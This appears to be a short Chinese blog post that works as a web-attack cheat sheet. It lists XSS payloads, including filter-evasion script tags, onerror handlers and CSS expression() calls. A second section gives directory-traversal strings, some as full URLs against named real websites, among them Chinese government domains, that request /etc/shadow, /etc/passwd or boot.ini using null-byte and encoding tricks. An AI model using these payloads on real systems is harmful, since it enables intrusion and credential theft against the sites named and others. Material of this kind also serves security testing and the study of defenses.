XSS
http://htmlpurifier.org/live/smoketests/xssAttacks.php
http://www.wooyun.org/whitehats/%E5%BF%83%E4%BC%A4%E7%9A%84%E7%98%A6%E5%AD%90
'';!--"<XSS>=&{()}
1 y=
<div style=width:expression(alert(/xss/))>
<div style=width:expression(prompt(937511))>
1%20onmouseover%3dprompt(920753)%20y%3d
<scr<script>ipt>alert(1)</scr<script>ipt>
<img src=d.jpg onerror=confirm(/xss/)>
style=width:expression(alert(/xss/))
<svg><s1cript>alert(/1/)</script>
———————————————————
遍历
http://www.leaf520.com/bbs/viewtopic.php?f=53&t=441
http://www.ynjst.gov.cn:82/ghc/editor/down.jsp?path=../../../../../../../etc&file=shadow http://cks.mof.gov.cn/crifs/content/docmanage/download.jspfilePath=../../../../../../../../etc/passwd/do=../../../../../../../../../../etc/passwd%00.jpg&mod=info&sort_id=6 http://www.kaixin001.com/records/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg-30.html /../../../../../../../../../../../boot.ini%00 /../../../../../../../../../../../boot.ini /..\../..\../..\../..\../..\../..\../boot.ini /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini \..\..\..\..\..\..\..\..\..\..\boot.ini ..\..\..\..\..\..\..\..\..\..\boot.ini%00 ..\..\..\..\..\..\..\..\..\..\boot.ini /../../../../../../../../../../../boot.ini%00.html /../../../../../../../../../../../boot.ini%00.jpg
扫一扫
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
